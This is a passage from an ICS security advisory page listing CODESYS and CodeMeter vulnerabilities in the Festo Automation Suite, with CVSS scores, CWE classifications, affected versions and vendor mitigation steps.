<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-14513</a></h3>
<div class="csaf-accordion-content">
<p>CodeMeter (All versions prior to 6.81) and the software using it may crash while processing a specifically crafted license file due to unverified length fields.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-14513">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-14515</a></h3>
<div class="csaf-accordion-content">
<p>CodeMeter (All versions prior to 6.90 when using CmActLicense update files with CmActLicense Firm Code) has an issue in the license-file signature checking mechanism, which allows attackers to build arbitrary license files, including forging a valid license file as if it were a valid license file of an existing vendor. Only CmActLicense update files with CmActLicense Firm Code are affected.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-14515">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/347.html">CWE-347 Improper Verification of Cryptographic Signature</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-14517</a></h3>
<div class="csaf-accordion-content">
<p>Protocol encryption can be easily broken for CodeMeter (All versions prior to 6.90 are affected, including Version 6.90 or newer only if CodeMeter Runtime is running as server) and the server accepts external connections, which may allow an attacker to remotely communicate with the CodeMeter API.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-14517">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/326.html">CWE-326 Inadequate Encryption Strength</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-14519</a></h3>
<div class="csaf-accordion-content">
<p>This vulnerability allows an attacker to use the internal WebSockets API for CodeMeter (All versions prior to 7.00 are affected, including Version 7.0 or newer with the affected WebSockets API still enabled. This is especially relevant for systems or devices where a web browser is used to access a web server) via a specifically crafted Java Script payload, which may allow alteration or creation of license files for when combined with CVE-2020-14515.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-14519">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/346.html">CWE-346 Origin Validation Error</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-15806</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS Control runtime system before 3.5.16.10 allows Uncontrolled Memory Allocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-15806">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/401.html">CWE-401 Missing Release of Memory after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-16233</a></h3>
<div class="csaf-accordion-content">
<p>An attacker could send a specially crafted packet that could have CodeMeter (All versions prior to 7.10) send back packets containing data from the heap.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-16233">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/404.html">CWE-404 Improper Resource Shutdown or Release</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-7052</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS Control V3, Gateway V3, and HMI V3 before 3.5.15.30 allow uncontrolled memory allocation which can result in a remote denial of service condition.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-7052">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/770.html">CWE-770 Allocation of Resources Without Limits or Throttling</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-21863</a></h3>
<div class="csaf-accordion-content">
<p>A unsafe deserialization vulnerability exists in the ComponentModel Profile.FromFile() functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-21863">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/502.html">CWE-502 Deserialization of Untrusted Data</a></p>
<hr>
